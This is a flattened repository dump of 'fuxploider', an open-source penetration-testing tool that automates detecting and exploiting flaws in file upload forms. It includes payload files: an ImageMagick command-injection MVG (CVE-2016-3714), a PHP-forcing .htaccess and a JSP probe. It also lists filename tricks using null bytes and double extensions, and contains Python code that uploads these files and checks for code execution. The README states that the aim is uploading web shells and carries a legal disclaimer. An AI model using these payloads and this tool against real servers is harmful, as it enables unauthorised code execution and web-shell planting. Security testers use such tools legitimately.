├── payloads ├── template.jsp ├── template.php ├── template.gif ├── template.jpg ├── imagemagick_rce.mvg └── .htaccess ├── requirements.txt ├── screenshot.png ├── .deepsource.toml ├── Dockerfile ├── techniques.json ├── README.md ├── .gitignore ├── templates.json ├── mimeTypes.basic ├── utils.py ├── UploadForm.py ├── mimeTypes.advanced ├── fuxploider.py └── LICENSE.md /payloads/template.jsp: -------------------------------------------------------------------------------- 1 | <%= 5+7 %> 2 | -------------------------------------------------------------------------------- /payloads/template.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | coloredlogs 3 | beautifulsoup4 4 | -------------------------------------------------------------------------------- /screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/almandin/fuxploider/HEAD/screenshot.png -------------------------------------------------------------------------------- /payloads/template.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/almandin/fuxploider/HEAD/payloads/template.gif -------------------------------------------------------------------------------- /payloads/template.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/almandin/fuxploider/HEAD/payloads/template.jpg -------------------------------------------------------------------------------- /.deepsource.toml: -------------------------------------------------------------------------------- 1 | version = 1 2 | 3 | [[analyzers]] 4 | name = "python" 5 | enabled = true 6 | 7 | [analyzers.meta] 8 | runtime_version = "3.x.x" 9 | -------------------------------------------------------------------------------- /payloads/imagemagick_rce.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://example.com/image.jpg"|echo ImageTragick Detected! > "$filename$.txt)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /payloads/.htaccess: -------------------------------------------------------------------------------- 1 | #Matches the .htaccess file itself 2 | 3 | #Allow to view the ".htaccess" file (overrides default rule in apache2.conf) 4 | Require all granted 5 | #Force treatment of file as PHP file 6 | ForceType application/x-httpd-php 7 | 8 | 9 | #php code must be commented in order to not be interpreted as a .htaccess configuration 10 | # 11 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.6-alpine 2 | LABEL author="Mostafa Hussein " 3 | RUN apk add --no-cache gcc musl-dev libxml2-dev libxslt-dev openssl 4 | COPY . /home/fuxploider 5 | WORKDIR /home/fuxploider 6 | RUN pip3 install -r requirements.txt 7 | RUN adduser -D fuxploider -H -h /home/fuxploider && chown fuxploider:fuxploider /home/fuxploider -R 8 | USER fuxploider 9 | ENTRYPOINT ["python", "fuxploider.py"] 10 | CMD ["-h"] 11 | -------------------------------------------------------------------------------- /techniques.json: -------------------------------------------------------------------------------- 1 | [ 2 | {"suffix":".$nastyExt$","mime":"nasty"}, 3 | {"suffix":".$nastyExt$","mime":"legit"}, 4 | 5 | {"suffix":".$nastyExt$.$legitExt$","mime":"nasty"}, 6 | {"suffix":".$nastyExt$.$legitExt$","mime":"legit"}, 7 | {"suffix":".$legitExt$.$nastyExt$","mime":"nasty"}, 8 | {"suffix":".$legitExt$.$nastyExt$","mime":"legit"}, 9 | 10 | {"suffix":".$nastyExt$%00.$legitExt$","mime":"legit"}, 11 | {"suffix":".$nastyExt$%00.$legitExt$","mime":"nasty"}, 12 | {"suffix":".$legitExt$%00.$nastyExt$","mime":"legit"}, 13 | {"suffix":".$legitExt$%00.$nastyExt$","mime":"nasty"} 14 | ] -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # fuxploider 2 | 3 | [![Python 3.6](https://img.shields.io/badge/python-3.6%20%2B-green.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv3-red.svg)](https://raw.githubusercontent.com/almandin/fuxploider/master/LICENSE.md) 4 | 5 | Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server. 6 | 7 | Screenshots 8 | ---- 9 | ![screenshot](screenshot.png) 10 | 11 | Installation 12 | ---- 13 | 14 | _You will need Python 3.6 at least._ 15 | 16 | git clone https://github.com/almandin/fuxploider.git 17 | cd fuxploider 18 | pip3 install -r requirements.txt 19 | 20 | If you have problems with pip (and if you use windows apparently) : 21 | 22 | python3 -m pip install -r requirements.txt 23 | 24 | For Docker installation 25 | 26 | # Build the docker image 27 | docker build -t almandin/fuxploider . 28 | 29 | Usage 30 | ---- 31 | 32 | To get a list of basic options and switches use : 33 | 34 | python3 fuxploider.py -h 35 | 36 | Basic example : 37 | 38 | python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type" 39 | 40 | > [!] legal disclaimer : Usage of fuxploider for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 41 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | -------------------------------------------------------------------------------- /templates.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "templateName" : "phpinfo", 4 | "description" : "Basic php file (plain text) with simple call to phpinfo().", 5 | "filename":"template.php", 6 | "nastyExt":"php", 7 | "codeExecRegex":"\\phpinfo\\(\\)\\<\\/title\\>(.|\n)*\\PHP License\\<\\/h2\\>", 8 | "extVariants":["php1","php2","php3","php4","php5","phtml","pht","Php","PhP","pHp","pHp1","pHP2","pHtMl","PHp5"] 9 | },{ 10 | "templateName" : "nastygif", 11 | "description" : "Valid GIF file with basic call to phpinfo() in the comments section of the file", 12 | "filename":"template.gif", 13 | "nastyExt":"php", 14 | "codeExecRegex":"\\phpinfo\\(\\)\\<\\/title\\>(.|\n)*\\PHP License\\<\\/h2\\>", 15 | "extVariants":["php1","php2","php3","php4","php5","phtml","pht","Php","PhP","pHp","pHp1","pHP2","pHtMl","PHp5"] 16 | },{ 17 | "templateName" : "nastyjpg", 18 | "description" : "Valid JPG file with basic call to phpinfo() in the comments section of the file", 19 | "filename":"template.jpg", 20 | "nastyExt":"php", 21 | "codeExecRegex":"\\phpinfo\\(\\)\\<\\/title\\>(.|\n)*\\PHP License\\<\\/h2\\>", 22 | "extVariants":["php1","php2","php3","php4","php5","phtml","pht","Php","PhP","pHp","pHp1","pHP2","pHtMl","PHp5"] 23 | }, 24 | { 25 | "templateName" : "basicjsp", 26 | "description" : "Basic jsp file with simple mathematical expression.", 27 | "filename":"template.jsp", 28 | "nastyExt":"jsp", 29 | "codeExecRegex":"12", 30 | "extVariants":["JSP","jSp"] 31 | }, 32 | { 33 | "templateName" : "imagetragick", 34 | "description" : "Attempts to exploit RCE in ImageMagick (CVE-2016–3714)", 35 | "filename":"imagemagick_rce.mvg", 36 | "codeExecRegex":"ImageTragick Detected!", 37 | "codeExecURL":"$uploadFormDir$/$filename$.txt", 38 | "dynamicPayload":"True" 39 | }, 40 | { 41 | "templateName" : "htaccess", 42 | "description" : "Exploit apache 2.4 misconfiguration by uploading .htaccess file", 43 | "filename":".htaccess", 44 | "staticFilename":"True", 45 | "codeExecRegex":"\\phpinfo\\(\\)\\<\\/title\\>(.|\n)*\\PHP License\\<\\/h2\\>" 46 | } 47 | ] 48 | -------------------------------------------------------------------------------- /mimeTypes.basic: -------------------------------------------------------------------------------- 1 | image/jpeg jpeg jpg jpe 2 | image/x-ms-bmp bmp 3 | image/png png 4 | image/tiff tiff tif 5 | image/svg+xml svg svgz 6 | application/octet-stream mvg 7 | image/gif gif 8 | image/vnd.microsoft.icon ico 9 | text/plain asc txt text pot brf srt 10 | application/pdf pdf 11 | application/vnd.ms-powerpoint ppt pps 12 | application/vnd.openxmlformats-officedocument.presentationml.presentation pptx 13 | application/vnd.oasis.opendocument.text odt 14 | application/vnd.ms-excel xls xlb xlt 15 | application/msword doc dot 16 | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx 17 | application/vnd.openxmlformats-officedocument.wordprocessingml.document docx 18 | video/mpeg mpeg mpg mpe 19 | audio/mpeg mpga mpega mp2 mp3 m4a 20 | video/x-msvideo avi 21 | audio/mpegurl m3u 22 | audio/x-wav wav 23 | image/x-photoshop psd 24 | video/x-flv flv 25 | video/mp4 mp4 26 | application/x-tar tar 27 | application/gzip gz 28 | application/zip zip 29 | application/rar rar 30 | application/x-7z-compressed 7z 31 | application/x-iso9660-image iso 32 | application/java-archive jar 33 | text/csv csv 34 | application/x-rss+xml rss 35 | text/css css 36 | application/x-bittorrent torrent 37 | text/html html htm shtml 38 | application/font-sfnt otf ttf 39 | application/x-msdos-program com exe bat dll 40 | video/quicktime qt mov 41 | application/x-cbr cbr 42 | application/x-cdlink vcd 43 | application/x-trash ~ % bak old sik 44 | application/octet-stream bin deploy msu msp 45 | audio/midi mid midi kar 46 | chemical/x-cerius cer 47 | application/vnd.stardivision.math sdf 48 | chemical/x-mdl-sdfile sd sdf 49 | text/vcard vcf vcard 50 | text/x-c++src c++ cpp cxx cc 51 | text/x-chdr h 52 | application/vnd.google-earth.kmz kmz 53 | application/x-shockwave-flash swf swfl 54 | application/vnd.debian.binary-package deb ddeb udeb 55 | application/x-debian-package deb udeb 56 | application/javascript js 57 | application/x-stuffit sit sitx 58 | application/java-vm class 59 | application/mac-binhex40 hqx 60 | application/x-sql sql 61 | text/html html htm shtml 62 | audio/x-pn-realaudio ra rm ram 63 | text/x-perl pl pm 64 | application/rtf rtf 65 | text/asp asp 66 | application/x-httpd-php phtml pht php 67 | application/x-sh sh 68 | text/x-sh sh 69 | audio/x-mpegurl m3u 70 | text/x-csrc c 71 | application/x-msdos-program com exe bat dll 72 | video/3gpp 3gp 73 | application/vnd.android.package-archive apk 74 | application/x-msdos-program com exe bat dll 75 | chemical/x-gamess-input inp gam gamin 76 | application/postscript ps ai eps epsi epsf eps2 eps3 77 | text/x-tex tex ltx sty cls 78 | application/font-sfnt otf ttf 79 | application/msaccess mdb 80 | video/x-ms-wmv wmv 81 | application/vnd.google-earth.kml+xml kml 82 | audio/x-aiff aif aiff aifc 83 | chemical/x-pdb pdb ent 84 | video/x-ms-asf asf asx 85 | application/pics-rules prf 86 | text/x-java java 87 | audio/x-ms-wma wma 88 | application/x-cab cab 89 | application/x-apple-diskimage dmg 90 | application/pgp-keys key 91 | text/calendar ics icz 92 | application/xhtml+xml xhtml xht 93 | application/xml xml xsd 94 | application/vnd.wordperfect wpd 95 | application/x-msi msi 96 | application/x-redhat-package-manager rpm 97 | text/x-python py 98 | -------------------------------------------------------------------------------- /utils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import re 3 | import sys 4 | import argparse 5 | import tempfile 6 | from urllib.parse import urlparse 7 | 8 | import requests 9 | from bs4 import BeautifulSoup 10 | 11 | 12 | def quitting(signal, frame): 13 | if input("\nWant to stop ? [y/N] ").lower().startswith("y"): 14 | sys.exit(0) 15 | 16 | 17 | def valid_url(url) : 18 | parsedUrl = urlparse(url) 19 | if parsedUrl.scheme != "" and parsedUrl.netloc != "": 20 | return url 21 | return False 22 | 23 | 24 | def valid_proxyString(proxyString): 25 | exp = re.compile(r"^(?:(https?):\/\/)?(?:(.+?):(.+?)@)?([A-Za-z0-9\_\-\~\.]+)(?::([0-9]+))?$") 26 | r = exp.match(proxyString) 27 | if r: 28 | return {"username": r.group(2), 29 | "password": r.group(3), 30 | "protocol": r.group(1), 31 | "hostname": r.group(4), 32 | "port": r.group(5)} 33 | raise argparse.ArgumentTypeError("Proxy information must be like \"[user:pass@]host:port\". " 34 | "Example : \"user:pass@proxy.host:8080\".") 35 | 36 | 37 | def valid_regex(regex): 38 | try: 39 | re.compile(regex) 40 | except re.error: 41 | raise argparse.ArgumentTypeError("The given regex argument does not " 42 | "look like a valid regular expression.") 43 | return regex 44 | 45 | 46 | def is_regex(regex): 47 | try: 48 | re.compile(regex) 49 | return True 50 | except re.error: 51 | return False 52 | 53 | 54 | def valid_proxyCreds(creds): 55 | exp = re.compile("^([^\n\t :]+):([^\n\t :]+)$") 56 | r = exp.match(creds) 57 | if r: 58 | return {"username": r.group(1), "password": r.group(2)} 59 | raise argparse.ArgumentTypeError(f"Proxy credentials must follow the next format: " 60 | " 'user:pass'. Provided : '{creds}'") 61 | 62 | 63 | def valid_nArg(n): 64 | if int(n) > 0: 65 | return n 66 | raise argparse.ArgumentTypeError("Positive integer expected.") 67 | 68 | 69 | def valid_postData(data): 70 | exp = re.compile("([^=&?\n]*=[^=&?\n]*&?)+") 71 | if exp.match(data): 72 | return data 73 | raise argparse.ArgumentTypeError("Additional POST data must be written like the following: " 74 | "'key1=value1&key2=value2&...'") 75 | 76 | 77 | def getHost(url) : 78 | exp = re.compile("^(https?\:\/\/)((([\da-z\.-]+)\.([a-z\.]{2,6}))|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})(:[0-9]+)?([\/\w \.-]*)\/?([\/\w \.-]*)\/?((\?|&).+?(=.+?)?)*$") 79 | res = exp.match(url) 80 | return str(res.group(2)) 81 | 82 | 83 | def postDataFromStringToJSON(params): 84 | if params: 85 | prePostData = params.split("&") 86 | postData = {} 87 | for d in prePostData: 88 | p = d.split("=", 1) 89 | postData[p[0]] = p[1] 90 | return postData 91 | return {} 92 | 93 | 94 | def getFormInputs(html): 95 | soup = BeautifulSoup(html,'html.parser') 96 | return soup.find_all("input") 97 | 98 | 99 | def detectForms(html): 100 | soup = BeautifulSoup(html, 'html.parser') 101 | detectedForms = soup.find_all("form") 102 | returnForms = [] 103 | if detectedForms: 104 | for f in detectedForms: 105 | fileInputs = f.findChildren("input", {"type": re.compile("file", re.IGNORECASE)}) 106 | if fileInputs: 107 | returnForms.append((f, fileInputs)) 108 | return returnForms 109 | 110 | 111 | def getMime(extensions, ext): 112 | for e in extensions: 113 | if e[0] == ext: 114 | return e[1] 115 | 116 | 117 | def getResource(url): 118 | exp = re.compile(r"^(https?\:\/\/)((([\da-z\.-]+)\.([a-z\.]{2,6}))|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})(:[0-9]+)?([\/\w \.-]*)\/?([\/\w \.-]*)\/?((\?|&).+?(=.+?)?)*$") 119 | r = exp.match(url) 120 | z = r.group(7).split('/') 121 | return z[len(z)-1] 122 | 123 | 124 | def loadExtensions(loadFrom, filepath="mimeTypes.advanced"): 125 | ext = [] 126 | if loadFrom == "file": 127 | with open(filepath, "r") as fd: 128 | ext = [] 129 | for e in fd: 130 | e = e[:-1] 131 | ligne = e.split(" ") 132 | mime = ligne[0] 133 | for z in ligne[1:]: 134 | ext.append((z, mime)) 135 | elif isinstance(loadFrom, list): 136 | for askedExt in loadFrom: 137 | with open(filepath, "r") as fd: 138 | for e in fd: 139 | e = e[:-1] 140 | ligne = e.split(" ") 141 | mime = ligne[0] 142 | 143 | if askedExt in ligne: 144 | ext.append((askedExt, mime)) 145 | 146 | return ext 147 | 148 | 149 | def addProxyCreds(initProxy, creds): 150 | httpproxy = initProxy["http"] 151 | httpsproxy = initProxy["https"] 152 | if re.match(r"^http\://.*", httpproxy): 153 | httpproxy = f"http://{creds[0]}:{creds[1]}@{httpproxy[7:]}" 154 | else: 155 | httpproxy = f"http://{creds[0]}:{creds[1]}@{httpproxy}" 156 | 157 | if re.match("^https\://.*", httpsproxy): 158 | httpsproxy = f"https://{creds[0]}:{creds[1]}@{httpsproxy[8:]}" 159 | else: 160 | httpsproxy = f"https://{creds[0]}:{creds[1]}@{httpsproxy}" 161 | return {"http": httpproxy, "https": httpsproxy} 162 | 163 | 164 | def printSimpleResponseObject(resObject): 165 | print("\033[36m{resObject.request.method} - {resObject.request.url}: {resObject.status_code}\033[m") 166 | printFormattedHeaders(resObject.headers) 167 | 168 | 169 | def printFormattedHeaders(headers): 170 | for key, value in headers.items(): 171 | print(f"\033[36m\t- {key}: {value}\033[m") 172 | 173 | 174 | def getPoisoningBytes(): 175 | return ["%00"] 176 | # return ["%00",":",";"] 177 | -------------------------------------------------------------------------------- /UploadForm.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | import logging 4 | import sys 5 | import tempfile 6 | import concurrent.futures 7 | from threading import Lock 8 | from urllib.parse import urljoin, urlparse 9 | 10 | from bs4 import BeautifulSoup 11 | 12 | from utils import * 13 | 14 | 15 | class UploadForm: 16 | def __init__(self, notRegex, trueRegex, session, size, postData, 17 | uploadsFolder=None, formUrl=None, formAction=None, inputName=None): 18 | self.logger = logging.getLogger("fuxploider") 19 | self.postData = postData 20 | self.formUrl = formUrl 21 | url = urlparse(self.formUrl) 22 | self.schema = url.scheme 23 | self.host = url.netloc 24 | self.uploadUrl = urljoin(formUrl, formAction) 25 | self.session = session 26 | self.trueRegex = trueRegex 27 | self.notRegex = notRegex 28 | self.inputName = inputName 29 | self.uploadsFolder = uploadsFolder 30 | self.size = size 31 | self.validExtensions = [] 32 | self.httpRequests = 0 33 | self.codeExecUrlPattern = None # Pattern for code exec detection using true regex findings 34 | self.logLock = Lock() 35 | self.stopThreads = False 36 | self.shouldLog = True 37 | 38 | # Searches for a valid html form containing an input file, sets object parameters correctly 39 | def setup(self, initUrl): 40 | self.formUrl = initUrl 41 | url = urlparse(self.formUrl) 42 | self.schema = url.scheme 43 | self.host = url.netloc 44 | 45 | self.httpRequests = 0 46 | try: 47 | initGet = self.session.get(self.formUrl, headers={"Accept-Encoding":None}) 48 | self.httpRequests += 1 49 | if self.logger.verbosity > 1: 50 | printSimpleResponseObject(initGet) 51 | if self.logger.verbosity > 2: 52 | print(f"\033[36m{initGet.text}\033[m") 53 | if initGet.status_code < 200 or initGet.status_code > 300: 54 | self.logger.critical("Server responded with following status: %s - %s", 55 | initGet.status_code, initGet.reason) 56 | sys.exit(1) 57 | except Exception as e: 58 | self.logger.critical("%s: Host unreachable (%s)", getHost(initUrl), e) 59 | sys.exit(1) 60 | 61 | # Detect and get the form's data 62 | detectedForms = self.detectForms(initGet.text) 63 | if not detectedForms: 64 | self.logger.critical("No HTML forms found.") 65 | sys.exit() 66 | if len(detectedForms) > 1: 67 | self.logger.critical("%s forms found containing file upload inputs, no way to choose which one to test.", len(detectedForms)) 68 | sys.exit() 69 | if len(detectedForms[0][1]) > 1: 70 | self.logger.critical("%s file inputs found inside the same form, no way to choose which one to test.", len(detectedForms[0])) 71 | sys.exit() 72 | 73 | self.inputName = detectedForms[0][1][0]["name"] 74 | self.logger.debug("Found the following file upload input: %s", self.inputName) 75 | formDestination = detectedForms[0][0] 76 | 77 | try: 78 | self.action = formDestination["action"] 79 | except: 80 | self.action = "" 81 | self.uploadUrl = urljoin(self.formUrl, self.action) 82 | 83 | self.logger.debug("Using following URL for file upload: %s", self.uploadUrl) 84 | 85 | if not self.uploadsFolder and not self.trueRegex: 86 | self.logger.warning("No uploads folder nor true regex defined, " 87 | "code execution detection will not be possible. " 88 | "(Except for templates with a custom codeExecURL)") 89 | elif not self.uploadsFolder and self.trueRegex: 90 | print("No uploads path provided, code detection can still be done " 91 | "using true regex capturing group. " 92 | "(Except for templates with a custom codeExecURL)") 93 | cont = input("Do you want to use the True Regex for code execution detection ? [Y/n] ") 94 | if cont.lower().startswith("y") or cont == "": 95 | prefixPattern = input("Prefix capturing group of the true regex with: ") 96 | suffixPattern = input("Suffix capturing group of the true regex with: ") 97 | self.codeExecUrlPattern = "".join((prefixPattern, "$captGroup$", suffixPattern)) 98 | else: 99 | self.logger.warning("Code execution detection will not be possible as " 100 | "there is no path nor regex pattern configured. " 101 | "(Except for templates with a custom codeExecURL)") 102 | 103 | # Tries to upload a file through the file upload form. 104 | def uploadFile(self, suffix, mime, payload, 105 | dynamicPayload=False, payloadFilename=None, staticFilename=False): 106 | with tempfile.NamedTemporaryFile(suffix=suffix) as fd: 107 | if staticFilename: 108 | filename = payloadFilename 109 | else: 110 | filename = os.path.basename(fd.name) 111 | filename_wo_ext = filename.split('.', 1)[0] 112 | if dynamicPayload: 113 | payload = payload.replace(b"$filename$", bytearray(filename_wo_ext, 'ascii')) 114 | fd.write(payload) 115 | fd.flush() 116 | fd.seek(0) 117 | if self.shouldLog: 118 | self.logger.debug("Sending file %s with mime type: %s", filename, mime) 119 | fileUploadResponse = self.session.post( 120 | self.uploadUrl, 121 | files={self.inputName: (filename, fd, mime)}, 122 | data=self.postData 123 | ) 124 | self.httpRequests += 1 125 | if self.shouldLog: 126 | if self.logger.verbosity > 1: 127 | printSimpleResponseObject(fileUploadResponse) 128 | if self.logger.verbosity > 2: 129 | print(f"\033[36m{fileUploadResponse}\033[m") 130 | 131 | return (fileUploadResponse, filename, filename_wo_ext) 132 | 133 | # Detects if a given html code represents an upload success or not. 134 | def isASuccessfulUpload(self, html): 135 | result = False 136 | validExt = False 137 | if self.notRegex: 138 | fileUploaded = re.search(self.notRegex, html) 139 | if not fileUploaded: 140 | result = True 141 | if self.trueRegex: 142 | moreInfo = re.search(self.trueRegex, html) 143 | if moreInfo: 144 | try: 145 | result = str(moreInfo.group(1)) 146 | except: 147 | result = str(moreInfo.group(0)) 148 | 149 | if self.trueRegex and not result: 150 | fileUploaded = re.search(self.trueRegex, html) 151 | if fileUploaded: 152 | try: 153 | result = str(fileUploaded.group(1)) 154 | except: 155 | result = str(fileUploaded.group(0)) 156 | return result 157 | 158 | # Callback function for matching html text against regex in order to detect successful uploads 159 | def detectValidExtension(self, future): 160 | if not self.stopThreads: 161 | html = future.result()[0].text 162 | ext = future.ext[0] 163 | 164 | r = self.isASuccessfulUpload(html) 165 | if r: 166 | self.validExtensions.append(ext) 167 | if self.shouldLog: 168 | self.logger.info("\033[1m\033[42mExtension %s seems valid for this form.\033[m", ext) 169 | if r != True: 170 | self.logger.info("\033[1;32mTrue regex matched the following information: %s\033[m", r) 171 | return r 172 | 173 | def detectValidExtensions(self, extensions, maxN, extList=None): 174 | """Detect valid extensions for this upload form (sending legit files with legit mime types).""" 175 | self.logger.info("### Starting detection of valid extensions ...") 176 | n = 0 177 | if extList: 178 | tmpExtList = [] 179 | for e in extList: 180 | tmpExtList.append((e, getMime(extensions, e))) 181 | else: 182 | tmpExtList = extensions 183 | validExtensions = [] # unused? 184 | 185 | extensionsToTest = tmpExtList[0:maxN] 186 | with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor: 187 | futures = [] 188 | try: 189 | for ext in extensionsToTest: 190 | f = executor.submit( 191 | self.uploadFile, 192 | "." + ext[0], 193 | ext[1], 194 | os.urandom(self.size) 195 | ) 196 | f.ext = ext 197 | f.add_done_callback(self.detectValidExtension) 198 | futures.append(f) 199 | for future in concurrent.futures.as_completed(futures): 200 | a = future.result() 201 | n += 1 202 | except KeyboardInterrupt: 203 | self.shouldLog = False 204 | executor.shutdown(wait=False) 205 | self.stopThreads = True 206 | executor._threads.clear() 207 | concurrent.futures.thread._threads_queues.clear() 208 | return n 209 | 210 | def detectCodeExec(self, url, regex): 211 | """Detect if a code execution is gained, given an rul to request and a 212 | regex pattern to match the executed code output. 213 | """ 214 | if self.shouldLog: 215 | if self.logger.verbosity > 0: 216 | self.logger.debug("Requesting %s ...", url) 217 | 218 | r = self.session.get(url) 219 | if self.shouldLog: 220 | if r.status_code >= 400: 221 | self.logger.warning("Code exec detection returned an http code of %s.", r.status_code) 222 | self.httpRequests += 1 223 | if self.logger.verbosity > 1: 224 | printSimpleResponseObject(r) 225 | if self.logger.verbosity > 2: 226 | print(f"\033[36m{r.text}\033[m") 227 | 228 | res = re.search(regex, r.text) 229 | return bool(res) 230 | 231 | def submitTestCase(self, suffix, mime, 232 | payload=None, codeExecRegex=None, codeExecURL=None, 233 | dynamicPayload=False, payloadFilename=None, staticFilename=False): 234 | """Generate a temporary file using a suffixed name, a mime type and 235 | content. Upload the temp file on the server and eventually try to 236 | detect if code execution is gained through the uploaded file. 237 | """ 238 | fu = self.uploadFile(suffix, mime, payload, dynamicPayload, payloadFilename, staticFilename) 239 | uploadRes = self.isASuccessfulUpload(fu[0].text) 240 | result = {"uploaded": False, "codeExec": False} 241 | if not uploadRes: 242 | return result 243 | 244 | result["uploaded"] = True 245 | if self.shouldLog: 246 | self.logger.info("\033[1;32mUpload of '%s' with mime type %s successful\033[m", fu[1], mime) 247 | 248 | if uploadRes is True and self.shouldLog: 249 | self.logger.info("\033[1;32m\tTrue regex matched the following information: %s\033[m", uploadRes) 250 | 251 | if not codeExecRegex or not valid_regex(codeExecRegex): 252 | return result 253 | 254 | if self.uploadsFolder or self.trueRegex or codeExecURL: 255 | url = None 256 | secondUrl = None 257 | if self.uploadsFolder or codeExecURL: 258 | if codeExecURL: 259 | filename_wo_ext = fu[2] 260 | url = codeExecURL.replace("$uploadFormDir$", os.path.dirname(self.uploadUrl)) \ 261 | .replace("$filename$", filename_wo_ext) 262 | else: 263 | url = f"{self.schema}://{self.host}/{self.uploadsFolder}/{fu[1]}" 264 | filename = fu[1] 265 | secondUrl = None 266 | for byte in getPoisoningBytes(): 267 | if byte in filename: 268 | secondUrl = byte.join(url.split(byte)[:-1]) 269 | elif self.codeExecUrlPattern: 270 | #code exec detection through true regex 271 | url = self.codeExecUrlPattern.replace("$captGroup$", uploadRes) 272 | 273 | if url: 274 | executedCode = self.detectCodeExec(url, codeExecRegex) 275 | if executedCode: 276 | result["codeExec"] = True 277 | result["url"] = url 278 | if secondUrl: 279 | executedCode = self.detectCodeExec(secondUrl, codeExecRegex) 280 | if executedCode: 281 | result["codeExec"] = True 282 | result["url"] = secondUrl 283 | return result 284 | 285 | @staticmethod 286 | def detectForms(html): 287 | """Detect HTML forms. 288 | 289 | Returns a list of BeauitifulSoup objects (detected forms). 290 | """ 291 | soup = BeautifulSoup(html, "html.parser") 292 | detectedForms = soup.find_all("form") 293 | returnForms = [] 294 | if detectedForms: 295 | for f in detectedForms: 296 | fileInputs = f.findChildren("input", {"type": "file"}) 297 | if fileInputs: 298 | returnForms.append((f, fileInputs)) 299 | return returnForms -------------------------------------------------------------------------------- /mimeTypes.advanced: -------------------------------------------------------------------------------- 1 | image/jpeg jpeg jpg jpe 2 | image/png png 3 | image/gif gif 4 | image/x-ms-bmp bmp 5 | image/tiff tiff tif 6 | text/plain asc txt text pot brf srt 7 | application/pdf pdf 8 | application/msword doc dot 9 | application/vnd.openxmlformats-officedocument.presentationml.presentation pptx 10 | application/vnd.openxmlformats-officedocument.presentationml.slide sldx 11 | application/vnd.openxmlformats-officedocument.presentationml.slideshow ppsx 12 | application/vnd.openxmlformats-officedocument.presentationml.template potx 13 | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx 14 | application/vnd.openxmlformats-officedocument.spreadsheetml.template xltx 15 | application/vnd.openxmlformats-officedocument.wordprocessingml.document docx 16 | application/vnd.openxmlformats-officedocument.wordprocessingml.template dotx 17 | application/font-sfnt otf ttf 18 | application/gzip gz 19 | application/zip zip 20 | application/x-7z-compressed 7z 21 | application/rar rar 22 | application/postscript ps ai eps epsi epsf eps2 eps3 23 | application/javascript js 24 | application/json json 25 | application/rdf+xml rdf 26 | application/rtf rtf 27 | application/ecmascript es 28 | application/vnd.ms-excel xls xlb xlt 29 | application/vnd.ms-excel.addin.macroEnabled.12 xlam 30 | application/vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb 31 | application/vnd.ms-excel.sheet.macroEnabled.12 xlsm 32 | application/vnd.ms-excel.template.macroEnabled.12 xltm 33 | application/andrew-inset ez 34 | application/vnd.ms-powerpoint ppt pps 35 | application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam 36 | application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm 37 | application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm 38 | application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm 39 | application/vnd.ms-powerpoint.template.macroEnabled.12 potm 40 | application/vnd.ms-word.document.macroEnabled.12 docm 41 | application/vnd.ms-word.template.macroEnabled.12 dotm 42 | application/annodex anx 43 | application/atom+xml atom 44 | application/atomcat+xml atomcat 45 | application/atomserv+xml atomsrv 46 | application/bbolin lin 47 | application/cu-seeme cu 48 | application/davmount+xml davmount 49 | application/dicom 